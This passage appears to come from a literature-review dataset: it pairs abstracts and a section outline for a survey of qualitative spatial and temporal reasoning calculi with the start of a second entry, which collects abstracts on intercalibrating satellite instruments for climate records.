restricted type of DLRs, Horn DLRs, which have a polynomial-time satisfiability problem. We prove that most approaches to tractable temporal constraint reasoning can be encoded as Horn DLRs, including the ORD-Horn algebra by Nebel and Burckert and the simple temporal constraints by Dechter et al. Thus, DLRs is a suitable unifying formalism for reasoning about temporal constraints. --- paper_title: Qualitative spatial and temporal reasoning with AND/OR linear programming paper_content: This paper explores the use of generalized linear programming techniques to tackle two long-standing problems in qualitative spatio-temporal reasoning: Using LP as a unifying basis for reasoning, one can jointly reason about relations from different qualitative calculi. Also, concrete entities (fixed points, regions fixed in shape and/or position, etc.) can be mixed with free variables. Both features are important for applications but cannot be handled by existing techniques. In this paper we discuss properties of encoding constraint problems involving spatial and temporal relations. We advocate the use of AND/OR graphs to facilitate efficient reasoning and we show feasibility of our approach. --- paper_title: A much better polynomial time approximation of consistency in the LR calculus paper_content: In the area of qualitative spatial reasoning, the LR calculus (a refinement of Ligozat's flip-flop calculus) is a quite simple constraint calculus that forms the core of several orientation calculi like the Dipole calculi and the OPRA1 calculus by introducing the left-right-dichotomy. ::: ::: For many qualitative spatial calculi, algebraic closure is applied as the standard polynomial time “decision” procedure. For a long time it was believed that this can decide the consistency of scenarios of the LR calculus. However, in [8] it was shown that algebraic closure is a bad approximation of consistency for LR scenarios: scenarios in the base relations “Left” and “Right” are always algebraically closed, no matter if those scenarios are consistent or not. So algebraic closure is completely useless here. Furthermore, in [15] it was proved that the consistency problem for any calculus with relative orientation containing the relations “Left” and “Right” is NP-hard. ::: ::: In this paper we propose a new and better polynomial time approximation procedure for this NP-hard problem. It is based on the angles of triangles in the Euclidean plane. LR scenarios are translated to sets of linear inequalities over the real numbers. We evaluate the quality of this procedure by comparing it bot to the old approximation using algebraic closure and to the (exact but exponential time) Buchberger algorithm for Grobner bases (used as a decision method). --- paper_title: StarVars — Effective Reasoning about Relative Directions ∗ paper_content: Relative direction information is very commonly used. Observers typically describe their environment by specifying the relative directions in which they see other objects or other people from their point of view. Or they receive navigation instructions with respect to their point of view, for example, turn left at the next intersection. However, it is surprisingly hard to integrate relative direction information obtained from different observers, and to reconstruct a model of the environment or the locations of the observers based on this information. Despite intensive research, there is currently no algorithm that can effectively integrate this information: this problem is NP-hard, but not known to be in NP, even if we only use left and right relations. ::: ::: In this paper we present a novel qualitative representation, StarVars, that can solve these problems. It is an extension of the STAR calculus [Renz and Mitra, 2004]) by a VARiable interpretation of the orientation of observers. We show that reasoning in StarVars is in NP and present the first algorithm that allows us to effectively integrate relative direction information from different observers. --- paper_title: Generating approximate region boundaries from heterogeneous spatial information: An evolutionary approach paper_content: Spatial information takes different forms in different applications, ranging from accurate coordinates in geographic information systems to the qualitative abstractions that are used in artificial intelligence and spatial cognition. As a result, existing spatial information processing techniques tend to be tailored towards one type of spatial information, and cannot readily be extended to cope with the heterogeneity of spatial information that often arises in practice. In applications such as geographic information retrieval, on the other hand, approximate boundaries of spatial regions need to be constructed, using whatever spatial information that can be obtained. Motivated by this observation, we propose a novel methodology for generating spatial scenarios that are compatible with available knowledge. By suitably discretizing space, this task is translated to a combinatorial optimization problem, which is solved using a hybridization of two well-known meta-heuristics: genetic algorithms and ant colony optimization. What results is a flexible method that can cope with both quantitative and qualitative information, and can easily be adapted to the specific needs of specific applications. Experiments with geographic data demonstrate the potential of the approach. --- paper_title: – Mastering Left and Right – Different Approaches to a Problem That Is Not Straight Forward paper_content: Reasoning over spatial descriptions involving relations that can be described as left, right and inline has been studied extensively during the last two decades. While the fundamental nature of these relations makes reasoning about them applicable to a number of interesting problems, it also makes reasoning about them computationally hard. The key question of whether a given description using these relations can be realized is as hard as deciding satisfiability in the existential theory of the reals. In this paper we summarize the semi-decision procedures proposed so far and present the results of a random benchmark illustrating the relative effectiveness and efficiency of these procedures. --- paper_title: Here, there, but not everywhere: an extended framework for qualitative constraint satisfaction paper_content: Dealing with spatial and temporal knowledge is an indispensable part of almost all aspects of human activities. The qualitative approach to spatial and temporal reasoning (QSTR) provides a promising framework for spatial and temporal knowledge representation and reasoning. QSTR typically represents spatial/temporal knowledge in terms of qualitative relations (e.g., to the east of, after), and reasons with the knowledge by solving qualitative constraints. When formulating a qualitative constraint satisfaction problem (CSP), it is usually assumed that each variable could be "here, there and everywhere2." Practical applications e.g. urban planning, however, often require a variable taking values from a certain finite subset of the universe, i.e. require it to be 'here or there'. This paper extends the classic framework of qualitative constraint satisfaction by allowing variables taking values from finite domains. The computational complexity of this extended consistency problem is examined for five most important qualitative calculi, viz. Point Algebra, Interval Algebra, Cardinal Relation Algebra, RCC-5, and RCC-8. We show that the extended consistency problem remains in NP, but when only basic constraints are considered, the extended consistency problem for each calculus except Point Algebra is already NP-hard. --- paper_title: CLP(QS): a declarative spatial reasoning framework paper_content: We propose CLP(QS), a declarative spatial reasoning framework capable of representing and reasoning about high-level, qualitative spatial knowledge about the world. We systematically formalize and implement the semantics of a range of qualitative spatial calculi using a system of non-linear polynomial equations in the context of a classical constraint logic programming framework. Whereas CLP(QS) is a general framework, we demonstrate its applicability for the domain of Computer Aided Architecture Design. With CLP(QS) serving as a prototype, we position declarative spatial reasoning as a general paradigm open to other formalizations, reinterpretations, and extensions. We argue that the accessibility of qualitative spatial representation and reasoning mechanisms via the medium of high-level, logic-based formalizations is crucial for their utility toward solving real-world problems. ---
Title: A Survey of Qualitative Spatial and Temporal Calculi: Algebraic and Computational Properties Section 1: INTRODUCTION Description 1: Write about the importance of spatial and temporal knowledge across various knowledge-based systems, the focus on qualitative representations, and provide an overview of what the paper covers. Section 2: Demarcation of Scope and Contribution Description 2: Highlight the target audience, the scope of the survey, and the specific focus areas of qualitative calculi and their properties. Section 3: WHAT IS QUALITATIVE SPATIAL AND TEMPORAL REASONING Description 3: Explain the reasoning problems that QSTR deals with and provide a characterization of QSTR. Section 4: A General Definition of QSTR Description 4: Present a formal definition of QSTR, including the use of relational languages to represent and manipulate spatial and temporal knowledge. Section 5: Taxonomy of Constraint-Based Reasoning Tasks Description 5: Provide an overview of different reasoning tasks associated with QSTR, categorizing them using a taxonomy. Section 6: QUALITATIVE SPATIAL AND TEMPORAL CALCULI FOR DOMAIN REPRESENTATIONS Description 6: Survey the fundamental construct of qualitative calculi, discussing their minimal requirements and relevance for spatial and temporal representation. Section 7: Requirements to Qualitative Spatial and Temporal Calculi Description 7: Define the minimal requirements for qualitative calculi, including notions like partition schemes, identity, and converse. Section 8: Spatial and Temporal Reasoning Description 8: Discuss the role of qualitative constraint satisfaction problems (QCSPs) in spatial and temporal reasoning and introduce k-consistency. Section 9: Tools to Facilitate Qualitative Reasoning Description 9: List various tools and systems that support qualitative reasoning, including their specific functionalities. Section 10: Existing Qualitative Spatial and Temporal Calculi Description 10: Provide an overview of the existing qualitative calculi, referencing important tables and figures that help categorize them. Section 11: ALGEBRAIC PROPERTIES OF SPATIAL AND TEMPORAL CALCULI Description 11: Explain the algebraic properties of qualitative calculi, their importance, and how they relate to reasoning optimizations. Section 12: The Notion of a Relation Algebra Description 12: Define relation algebras and discuss their axioms relevant to the operations involved in qualitative calculi. Section 13: Discussion of the Axioms Description 13: Elaborate on the relevance and implications of the axioms for spatial and temporal representation and reasoning. Section 14: Prerequisites for Being a Relation Algebra Description 14: Discuss the necessary properties for a qualitative calculus to function as a relation algebra. Section 15: Algebraic Properties of Existing Spatial and Temporal Calculi Description 15: Analyze the algebraic properties of various existing spatial and temporal calculi and present results in a hierarchical structure. Section 16: Universal Procedure for Algebraic Closure Description 16: Introduce a universal algorithm for computing algebraic closure that is applicable across all calculi and respects all necessary axioms. Section 17: COMBINATION AND INTEGRATION Description 17: Review ways qualitative calculi can be combined with other knowledge representation languages and formalisms for enhanced expressivity. Section 18: Qualitative Calculi in Constraint-Based Knowledge Representation Languages Description 18: Discuss the use of qualitative calculi in constraint-based knowledge representation languages and their combinations for modeling complex knowledge. Section 19: Qualitative Relations and Classical Logics: Spatial Logics Description 19: Describe how qualitative relations can be combined with classical logics, especially spatial logics, for enriched representation and reasoning. Section 20: Qualitative Calculi and Description Logics Description 20: Explain how qualitative calculi can be integrated with description logics to describe spatial and temporal qualities in domains. Section 21: Qualitative Calculi and Situation Calculus Description 21: Address the integration of qualitative calculi with the situation calculus, highlighting their relevance for reasoning about actions and changes. Section 22: ALTERNATIVE APPROACHES Description 22: Provide an overview of alternative reasoning techniques for spatial and temporal reasoning that are not based solely on qualitative calculi. Section 23: Algebraic Topology Description 23: Discuss connections between algebraic topology and qualitative spatial reasoning, including topological invariants. Section 24: Combinatorial Geometry Description 24: Mention the importance of combinatorial structures like oriented matroid theory and their contributions to QSTR. Section 25: Graph Theoretical Approaches Description 25: Highlight the use of graph-theoretical methods to represent and reason about spatial changes based on qualitative relations. Section 26: Logic Frameworks Description 26: Explain the use of logic frameworks such as arrow logic to capture mereotopological relations and their automated reasoning potential. Section 27: Model-Theoretic and Constraint Reasoning Methods Description 27: Outline how qualitative CSPs can be reformulated as general CSPs and solved using model-theoretic methods and SAT solving. Section 28: Quantitative Methods Description 28: Describe how linear programming and quantitative methods can be utilized to decide constraint problems in spatial and temporal reasoning. Section 29: CONCLUSION AND FUTURE RESEARCH DIRECTIONS Description 29: Summarize the survey's findings and discuss potential future research directions in the field of qualitative spatial and temporal reasoning. Section 30: Beneficiaries of This Survey Description 30: Identify the primary beneficiaries of this survey and describe how different groups can utilize the information presented. Section 31: Open Problem Areas in QSTR Description 31: Highlight open problems and challenges in QSTR, suggesting areas that require further research and development. Section 32: ELECTRONIC APPENDIX Description 32: Provide information about the additional materials available in the electronic appendix, including examples, proofs, and experimental results.
Overview of Intercalibration of Satellite Instruments
6
--- paper_title: Achieving Satellite Instrument Calibration for Climate Change paper_content: For the most part, satellite observations of climate are not presently sufficiently accurate to establish a climate record that is indisputable and hence capable of determining whether and at what rate the climate is changing. Furthermore, they are insufficient for establishing a baseline for testing long-term trend predictions of climate models. Satellite observations do provide a clear picture of the relatively large signals associated with interannual climate variations such as El Nino-Southern Oscillation (ENSO), and they have also been used to diagnose gross inadequacies of climate models, such as their cloud generation schemes. However, satellite contributions to measuring long-term change have been limited and, at times, controversial, as in the case of differing atmospheric temperature trends derived from the U.S. National Oceanic and Atmospheric Administration's (NOAA) microwave radiometers. --- paper_title: Establishing the Antarctic Dome C community reference standard site towards consistent measurements from Earth observation satellites paper_content: Establishing satellite measurement consistency by using common desert sites has become increasingly more important not only for climate change detection but also for quantitative retrievals of geophysical variables in satellite applications. Using the Antarctic Dome C site (75°06′S, 123°21′E, elevation 3.2 km) for satellite radiometric calibration and validation (Cal/Val) is of great interest owing to its unique location and characteristics. The site surface is covered with uniformly distributed permanent snow, and the atmospheric effect is small and relatively constant. In this study, the long-term stability and spectral characteristics of this site are evaluated using well-calibrated satellite instruments such as the Moderate Resolution Imaging Spectroradiometer (MODIS) and Sea-viewing Wide Field-of-view Sensor (SeaWiFS). Preliminary results show that despite a few limitations, the site in general is stable in the long term, the bidirectional reflectance distribution function (BRDF) model works well, an... --- paper_title: Workshop on Strategies for Calibration and Validation of Global Change Measurements paper_content: The Committee on Environment and Natural Resources (CENR) Task Force on Observations and Data Management hosted a Global Change Calibration/Validation Workshop on May 10-12, 1995, in Arlington, Virginia. This Workshop was convened by Robert Schiffer of NASA Headquarters in Washington, D.C., for the CENR Secretariat with a view toward assessing and documenting lessons learned in the calibration and validation of large-scale, long-term data sets in land, ocean, and atmospheric research programs. The National Aeronautics and Space Administration (NASA)/Goddard Space Flight Center (GSFC) hosted the meeting on behalf of the Committee on Earth Observation Satellites (CEOS)/Working Group on Calibration/walidation, the Global Change Observing System (GCOS), and the U. S. CENR. A meeting of experts from the international scientific community was brought together to develop recommendations for calibration and validation of global change data sets taken from instrument series and across generations of instruments and technologies. Forty-nine scientists from nine countries participated. The U. S., Canada, United Kingdom, France, Germany, Japan, Switzerland, Russia, and Kenya were represented. --- paper_title: The Global Space-Based Inter-Calibration System paper_content: The Global Space-based Inter-Calibration System (GSICS) is a new international program to assure the comparability of satellite measurements taken at different times and locations by different instruments operated by different satellite agencies. Sponsored by the World Meteorological Organization and the Coordination Group for Meteorological Satellites, GSICS will intercalibrate the instruments of the international constellation of operational low-earth-orbiting (LEO) and geostationary earth-orbiting (GEO) environmental satellites and tie these to common reference standards. The intercomparability of the observations will result in more accurate measurements for assimilation in numerical weather prediction models, construction of more reliable climate data records, and progress toward achieving the societal goals of the Global Earth Observation System of Systems. GSICS includes globally coordinated activities for prelaunch instrument characterization, onboard routine calibration, sensor intercomparison of... --- paper_title: Satellite Instrument Calibration for Measuring Global Climate Change paper_content: Measuring the small changes associated with long-term global climate change from space is a daunting task. The satellite instruments must be capable of observing atmospheric and surface temperature trends as small as 0.1°C decade−1, ozone changes as little as 1% decade−1, and variations in the sun's output as tiny as 0.1% decade−1. To address these problems and recommend directions for improvements in satellite instrument calibration, the National Institute of Standards and Technology (NIST), National Polar-orbiting Operational Environmental Satellite System–Integrated Program Office (NPOESS-IPO), National Oceanic and Atmospheric Administration (NOAA), and National Aeronautics and Space Administration (NASA) organized a workshop at the University of Maryland Inn and Conference Center, College Park, Maryland, 12–14 November 2002. Some 75 scientists participated including researchers who develop and analyze long-term datasets from satellites, experts in the field of satellite instrument calibration, and phy... --- paper_title: An overview of sensor calibration inter-comparison and applications paper_content: Long-term climate data records (CDR) are often constructed using observations made by multiple Earth observing sensors over a broad range of spectra and a large scale in both time and space. These sensors can be of the same or different types operated on the same or different platforms. They can be developed and built with different technologies and are likely operated over different time spans. It has been known that the uncertainty of climate models and data records depends not only on the calibration quality (accuracy and stability) of individual sensors, but also on their calibration consistency across instruments and platforms. Therefore, sensor calibration inter-comparison and validation have become increasingly demanding and will continue to play an important role for a better understanding of the science product quality. This paper provides an overview of different methodologies, which have been successfully applied for sensor calibration inter-comparison. Specific examples using different sensors, including MODIS, AVHRR, and ETM+, are presented to illustrate the implementation of these methodologies. --- paper_title: Earth observation sensor calibration using a global instrumented and automated network of test sites (GIANTS) paper_content: Calibration is critical for useful long-term data records, as well as independent data quality control. However, in the context of Earth observation sensors, post-launch calibration and the associated quality assurance perspective are far from operational. This paper explores the possibility of establishing a global instrumented and automated network of test sites (GIANTS) for post-launch radiometric calibration of Earth observation sensors. It is proposed that a small number of well-instrumented benchmark test sites and data sets for calibration be supported. A core set of sensors, measurements, and protocols would be standardized across all participating test sites and the measurement data sets would undergo identical processing at a central secretariat. The network would provide calibration information to supplement or substitute for on-board calibration, would reduce the effort required by individual agencies, and would provide consistency for cross-platform studies. Central to the GIANTS concept is the use of automation, communication, coordination, visibility, and education, all of which can be facilitated by greater use of advanced in-situ sensor and telecommunication technologies. The goal is to help ensure that the resources devoted to remote sensing calibration benefit the intended user community and facilitate the development of new calibration methodologies (research and development) and future specialists (education and training). --- paper_title: Achieving Satellite Instrument Calibration for Climate Change paper_content: For the most part, satellite observations of climate are not presently sufficiently accurate to establish a climate record that is indisputable and hence capable of determining whether and at what rate the climate is changing. Furthermore, they are insufficient for establishing a baseline for testing long-term trend predictions of climate models. Satellite observations do provide a clear picture of the relatively large signals associated with interannual climate variations such as El Nino-Southern Oscillation (ENSO), and they have also been used to diagnose gross inadequacies of climate models, such as their cloud generation schemes. However, satellite contributions to measuring long-term change have been limited and, at times, controversial, as in the case of differing atmospheric temperature trends derived from the U.S. National Oceanic and Atmospheric Administration's (NOAA) microwave radiometers. --- paper_title: Intersatellite Differences of HIRS Longwave Channels Between NOAA-14 and NOAA-15 and Between NOAA-17 and METOP-A paper_content: Intersatellite differences of the High-Resolution Infrared Radiation Sounder (HIRS) longwave channels (channels 1-12) between National Oceanic and Atmospheric Administration 14 (NOAA-14) and NOAA-15 and between NOAA-17 and METOP-A are examined. Two sets of colocated data are incorporated in the examination. One data set is obtained during periods when equator crossing times of two satellites are very close to each other, and the data set is referred to as global simultaneous nadir overpass observation (SNO). The other data set is based on multiyear polar SNOs. The examination shows that intersatellite differences (ISDs) of temperature-sounding channels from lower stratosphere to lower troposphere, i.e., channels 3-7, are correlated with their corresponding lapse rate factors. Many of the channels also vary with respect to channel brightness temperatures; however, for the upper tropospheric temperature channel (channel 4), the patterns of ISDs from low latitudes and high latitudes are very different due to the fact that the latitudinal variation of brightness temperature does not necessarily follow the latitudinal variation of the temperature lapse rate. The differences between observations in low latitudes and high latitudes form “fork” patterns in scatter plots of ISDs with respect to brightness temperatures. A comparison of ISDs derived from short-term global SNOs and those derived from multiyear polar SNOs reveals the advantage and the limitation of the two data sets. The multiyear polar SNO generally provides larger observation ranges of brightness temperatures in channels 1-4. The global SNO extends the brightness temperature observations to the warm sides for channels 5-12 and captures the occurrences of larger ISDs for most longwave channels. --- paper_title: GSICS Inter-Calibration of Infrared Channels of Geostationary Imagers Using Metop/IASI paper_content: The first products of the Global Space-based Inter-Calibration System (GSICS) include bias monitoring and calibration corrections for the thermal infrared (IR) channels of current meteorological sensors on geostationary satellites. These use the hyperspectral Infrared Atmospheric Sounding Interferometer (IASI) on the low Earth orbit (LEO) Metop satellite as a common cross-calibration reference. This paper describes the algorithm, which uses a weighted linear regression, to compare collocated radiances observed from each pair of geostationary-LEO instruments. The regression coefficients define the GSICS Correction, and their uncertainties provide quality indicators, ensuring traceability to the selected community reference, IASI. Examples are given for the Meteosat, GOES, MTSAT, Fengyun-2, and COMS imagers. Some channels of these instruments show biases that vary with time due to variations in the thermal environment, stray light, and optical contamination. These results demonstrate how inter-calibration can be a powerful tool to monitor and correct biases, and help diagnose their root causes. --- paper_title: Establishing the Antarctic Dome C community reference standard site towards consistent measurements from Earth observation satellites paper_content: Establishing satellite measurement consistency by using common desert sites has become increasingly more important not only for climate change detection but also for quantitative retrievals of geophysical variables in satellite applications. Using the Antarctic Dome C site (75°06′S, 123°21′E, elevation 3.2 km) for satellite radiometric calibration and validation (Cal/Val) is of great interest owing to its unique location and characteristics. The site surface is covered with uniformly distributed permanent snow, and the atmospheric effect is small and relatively constant. In this study, the long-term stability and spectral characteristics of this site are evaluated using well-calibrated satellite instruments such as the Moderate Resolution Imaging Spectroradiometer (MODIS) and Sea-viewing Wide Field-of-view Sensor (SeaWiFS). Preliminary results show that despite a few limitations, the site in general is stable in the long term, the bidirectional reflectance distribution function (BRDF) model works well, an... --- paper_title: Using Moderate Resolution Imaging Spectrometer (MODIS) to calibrate advanced very high resolution radiometer reflectance channels paper_content: [1] A series of 10 advanced very high resolution radiometers (AVHRRs) flown on National Oceanic and Atmospheric Administration (NOAA)'s polar-orbiting satellites for over 20 years has provided data suitable for many quantitative remote sensing applications. To be useful for geophysical research, each radiometer must be accurately calibrated, which poses problems in the AVHRR reflectance channels because they have no onboard calibration. Previous studies have shown that values of the reflectance channel calibrations, accurately measured during preflight, change abruptly immediately after launch and then change slowly during the satellite's lifetime. The presence of the dual-gain reflectance channels on the current series of AVHRRs also complicates the application of previous calibration techniques. A technique is presented here for calibrating the AVHRR dual-gain reflectance channels using Moderate Resolution Imaging Spectrometer (MODIS) data. This method employs selective criteria to reproduce a laboratory type calibration where instrument counts observed by AVHRR are matched to reflectances measured by MODIS on a pixel by pixel basis for coincident and co-located scenes. Unlike AVHRR, MODIS employs onboard calibration of its reflectance channels. The goal here was to explore the utility of using MODIS to calibrate the new dual-gain reflectance channels of the AVHRR. The AVHRRs in the NOAA-KLM series of spacecraft employ a dual-gain approach to increase the sensitivity to dark scenes. Traditional methods using radiometrically stable targets to calibrate the reflectance channels of AVHRR typically do not provide data for both gain settings. The data from two scenes that met the over-pass criteria are analyzed. The regression of the MODIS reflectances versus the AVHRR counts for these scenes were able to produce calibration slopes and intercepts in both the low and high gain regions. The reflectance differences using the MODIS-derived calibration compared to preflight calibration are well within the expected behavior of the AVHRR during its first year in orbit. Comparison with reference ch1 and ch2 reflectance values from NOAA 9 for a Libyan Desert Target were within 5% of those using the MODIS-derived calibration. While the determination of the absolute accuracy this approach needs further study, it clearly offers the potential for calibration of the AVHRR dual-gain reflectance channels. --- paper_title: Accurate radiometry from space: an essential tool for climate studies paper_content: The Earth’s climate is undoubtedly changing; however, the time scale, consequences and causal attribution remain the subject of significant debate and uncertainty. Detection of subtle indicators from a background of natural variability requires measurements over a time base of decades. This places severe demands on the instrumentation used, requiring measurements of sufficient accuracy and sensitivity that can allow reliable judgements to be made decades apart. The International System of Units (SI) and the network of National Metrology Institutes were developed to address such requirements. However, ensuring and maintaining SI traceability of sufficient accuracy in instruments orbiting the Earth presents a significant new challenge to the metrology community. This paper highlights some key measurands and applications driving the uncertainty demand of the climate community in the solar reflective domain, e.g. solar irradiances and reflectances/radiances of the Earth. It discusses how meeting these uncertainties facilitate significant improvement in the forecasting abilities of climate models. After discussing the current state of the art, it describes a new satellite mission, called TRUTHS, which enables, for the first time, high-accuracy SI traceability to be established in orbit. The direct use of a ‘primary standard’ and replication of the terrestrial traceability chain extends the SI into space, in effect realizing a ‘metrology laboratory in space’. --- paper_title: Traceable radiometry underpinning terrestrial- and helio-studies (TRUTHS) paper_content: The Traceable Radiometry Underpinning Terrestrial- and Helio-Studies (TRUTHS) mission offers a novel approach to the provision of key scientific data wtih unprecedented radiometric accuracy for Earth Observation (EO) and solar studies, which will also establish well-calibrated reference targets/standards to support other SI missions. This paper will present the TRUTHS mission and its objectives. TRUTHS will be the first satellite mission to calibrate its instrumentation directly to SI in orbit, overcoming the usual uncertainties associated with drifts of sensor gain and spectral shape by using an electrical rather than an optical standard as the basis of its calibration. The range of instruments flown as part of the payload will also proivde accurate input data to improve atmospheric radiative transfer codes by anchoring boundary conditions, through simultaneous measurements of aerosols, particulates and radiances at various heights. Therefore, TRUTHS will significantly improve the performance and accuracy of Earth observation misison with broad global or operational aims, as well as more dedicated missions. The providision of reference standards will also improve synergy between missions by reducing errors due to different calibration biases and offer cost reductions for future missions by reducing the demands for on-board calibration systems. Such improvements are important for the future success of strategies such as Global Monitoring for Environment and Security and the implementation and monitoring of international treaties such as the Kyoto Protocol. TRUTHS will achieve these aims by measuring the geophysical variables of solar and lunar irradiance, together with both polarized and un-polarized spectral radiance of the Moon, and the Earth and its atmosphere. --- paper_title: Summary of current radiometric calibration coefficients for Landsat MSS, TM, ETM+, and EO-1 ALI sensors paper_content: article i nfo This paper provides a summary of the current equations and rescaling factors for converting calibrated Digital Numbers (DNs) to absolute units of at-sensor spectral radiance, Top-Of-Atmosphere (TOA) reflectance, and at-sensor brightness temperature. It tabulates the necessary constants for the Multispectral Scanner (MSS), Thematic Mapper (TM), Enhanced Thematic Mapper Plus (ETM+), and Advanced Land Imager (ALI) sensors. These conversions provide a basis for standardized comparison of data in a single scene or between images acquired on different dates or by different sensors. This paper forms a needed guide for Landsat data users who now have access to the entire Landsat archive at no cost. --- paper_title: Radiometric Calibration of the Landsat MSS Sensor Series paper_content: Multispectral remote sensing of the Earth using Landsat sensors was ushered on July 23, 1972, with the launch of Landsat-1. Following that success, four more Landsat satellites were launched, and each of these carried the Multispectral Scanner System (MSS). These five sensors provided the only consistent multispectral space-based imagery of the Earth's surface from 1972 to 1982. This work focuses on developing both a consistent and absolute radiometric calibration of this sensor system. Cross-calibration of the MSS was performed through the use of pseudoinvariant calibration sites (PICSs). Since these sites have been shown to be stable for long periods of time, changes in MSS observations of these sites were attributed to changes in the sensors themselves. In addition, simultaneous data collections were available for some MSS sensor pairs, and these were also used for cross-calibration. Results indicated substantial differences existed between instruments, up to 16%, and these were reduced to 5% or less across all MSS sensors and bands. Lastly, this paper takes the calibration through the final step and places the MSS sensors on an absolute radiometric scale. The methodology used to achieve this was based on simultaneous data collections by the Landsat-5 MSS and Thematic Mapper (TM) instruments. Through analysis of image data from a PICS location and through compensating for the spectral differences between the two instruments, the Landsat-5 MSS sensor was placed on an absolute radiometric scale based on the Landsat-5 TM sensor. Uncertainties associated with this calibration are considered to be less than 5%. --- paper_title: Assessment of Midnight Blackbody Calibration Correction (MBCC) using the Global Space-based Inter-Calibration System (GSICS) paper_content: The geostationary meteorological satellites (GEO), such as Geostationary Operational Environmental Satellite (GOES), ::: are susceptible to a calibration anomaly around local midnight of the sub-satellite point. A counter measure, the ::: Midnight Blackbody Calibration Correction (MBCC) currently exists at operational level. In this study, the MBCC ::: performance on GOES-11 satellite is characterized with the help of Global Space-based Inter-Calibration System ::: (GSICS) data sets. Results from the comparison of coincident and collocated GSICS-based GOES-11-AIRS data pairs, ::: corresponding to two and half year period from January 2007 through June 2009, reveal that "mid-night residuals" in ::: brightness temperatures persist in all of the GOES-11 Infra-Red (IR) channels, in spite of MBCC. The GOES-11 split ::: window channels (channels 4 and 5) consistently showed significantly large negative (GOES-11-AIRS) biases often ::: reaching values of -1. 5 K or less while the short wave Infra-Red (SWIR) channel (channel 2) produced relatively ::: smaller negative biases (~ -0.3 K or less). Interestingly, the water vapor IR channel (channel 3) exhibits a different ::: pattern from rest of the channels in which consistently opposite biases with small positive (GOES-11-AIRS) difference ::: values (~ 0.3 K or less) could be observed. The reason for the differential behavior of GOES-11 channel 3 is yet to be ::: understood, while it is hypothesized that this might be linked to the convolution algorithm used for matching the AIRS ::: data spectrally with those from GOES water vapor channel. The amount of midnight residuals is shown to have a ::: consistent seasonal dependency, which gets repeated year after year, for the period considered in the analysis. --- paper_title: Photometric Stability of the Lunar Surface paper_content: Abstract The rate at which cratering events currently occur on the Moon is considered in light of their influence on the use of the Moon as a radiometric standard. The radiometric effect of small impact events is determined empirically from the study of Clementine images. Events that would change the integral brightness of the moon by 1% are expected once per 1.4 Gyr. Events that cause a 1% shift in one pixel for low Earth-orbiting instruments with a 1-km nadir field of view are expected approximately once each 43 Myr. Events discernible at 1% radiometric resolution with a 5 arc-sec telescope resolution correspond to crater diameters of approximately 210 m and are expected once every 200 years. These rates are uncertain by a factor of two. For a fixed illumination and observation geometry, the Moon can be considered photometrically stable to 1 × 10 −8 per annum for irradiance, and 1 × 10 −7 per annum for radiance at a resolution common for spacecraft imaging instruments, exceeding reasonable instrument goals by six orders of magnitude. --- paper_title: Landsat 4 Thematic Mapper Calibration Update paper_content: The Landsat 4 Thematic Mapper (TM) collected imagery of the Earth's surface from 1982 to 1993. Although largely overshadowed by Landsat 5 which was launched in 1984, Landsat 4 TM imagery extends the TM-based record of the Earth back to 1982 and also substantially supplements the image archive collected by Landsat 5. To provide a consistent calibration record for the TM instruments, Landsat 4 TM was cross-calibrated to Landsat 5 using nearly simultaneous overpass imagery of pseudo-invariant calibration sites (PICS) in the time period of 1988-1990. To determine if the radiometric gain of Landsat 4 had changed over its lifetime, time series from two PICS locations (a Saharan site known as Libya 4 and a site in southwest North America, commonly referred to as the Sonoran Desert site) were developed. The results indicated that Landsat 4 had been very stable over its lifetime, with no discernible degradation in sensor performance in all reflective bands except band 1. In contrast, band 1 exhibited a 12% decay in responsivity over the lifetime of the instrument. Results from this paper have been implemented at USGS EROS, which enables users of Landsat TM data sets to obtain consistently calibrated data from Landsat 4 and 5 TM as well as Landsat 7 ETM+ instruments. --- paper_title: Revised landsat-5 tm radiometric calibration procedures and postcalibration dynamic ranges paper_content: Effective May 5, 2003, Landsat-5 (L5) Thematic Mapper (TM) data processed and distributed by the U.S. Geological Survey (USGS) Earth Resources Observation System (EROS) Data Center (EDC) will be radiometrically calibrated using a new procedure and revised calibration parameters. This change will improve absolute calibration accuracy, consistency over time, and consistency with Landsat-7 (L7) Enhanced Thematic Mapper Plus (ETM+) data. Users will need to use new parameters to convert the calibrated data products to radiance. The new procedure for the reflective bands (1-5,7) is based on a lifetime radiometric calibration curve for the instrument derived from the instrument's internal calibrator, cross-calibration with the ETM+, and vicarious measurements. The thermal band will continue to be calibrated using the internal calibrator. Further updates to improve the relative detector-to-detector calibration and thermal band calibration are being investigated, as is the calibration of the Landsat-4 (L4) TM. --- paper_title: Assessing the consistency of AVHRR and MODIS L1B reflectance for generating Fundamental Climate Data Records paper_content: [1] Satellite detection of the global climate change signals as small as a few percent per decade in albedo critically depends on consistent and accurately calibrated Level 1B (L1B) data or Fundamental Climate Data Records (FCDRs). Detecting small changes in signal over decades is a major challenge not only to the retrieval of geophysical parameters from satellite observations, but more importantly to the current state-of-the-art calibration, since such small changes can easily be obscured by erroneous variations in the calibration, especially for instruments with no onboard calibration, such as the Advanced Very High Resolution Radiometer (AVHRR). Without dependable FCDRs, its derivative Thematic Climate Data Records (TCDRs) are bound to produce false trends with questionable scientific value. This has been increasingly recognized by more and more remote sensing scientists. In this study we analyzed the consistency of calibrated reflectance from the operational L1B data between AVHRR on NOAA-16 and -17 and between NOAA-16/AVHRR and Aqua/MODIS, based on Simultaneous Nadir Overpass (SNO) observation time series. Analyses suggest that the NOAA-16 and -17/AVHRR operationally calibrated reflectance became consistent two years after the launch of NOAA-17, although they still differ by 9% from the MODIS reflectance for the 0.63 μm band. This study also suggests that the SNO method has reached a high level of relative accuracy (∼1.5%) for estimating the consistency for both the 0.63 and 0.84 μm bands between AVHRRs, and a 0.9% relative accuracy between AVHRR and MODIS for the 0.63 μm band. It is believed that the methodology is applicable to all historical AVHRR data for improving the calibration consistency, and work is in progress generating FCDRs from the nearly 30 years of AVHRR data using the SNO and other complimentary methods. A more consistent historical AVHRR L1B data set will be produced for a variety of geophysical products including aerosol, vegetation, cloud, and surface albedo to support global climate change detection studies. --- paper_title: Diurnal and Scan Angle Variations in the Calibration of GOES Imager Infrared Channels paper_content: The current Geostationary Operational Environmental Satellite (GOES) Imager infrared (IR) channels experience a midnight effect that can result in erroneous instrument responsivity around satellite midnight. An empirical method named the Midnight Blackbody Calibration Correction (MBCC) was developed and implemented in the GOES Imager IR operational calibration, aiming to correct the midnight calibration errors. The main objective of this study is to evaluate the MBCC performance for the GOES-11/-12 Imager IR channels by examining the diurnal variation of the mean brightness temperature (Tb) bias with respect to reference instruments. Two well-calibrated hyperspectral radiometers on low Earth orbits (LEOs), the Atmospheric Infrared Sounder on the Aqua 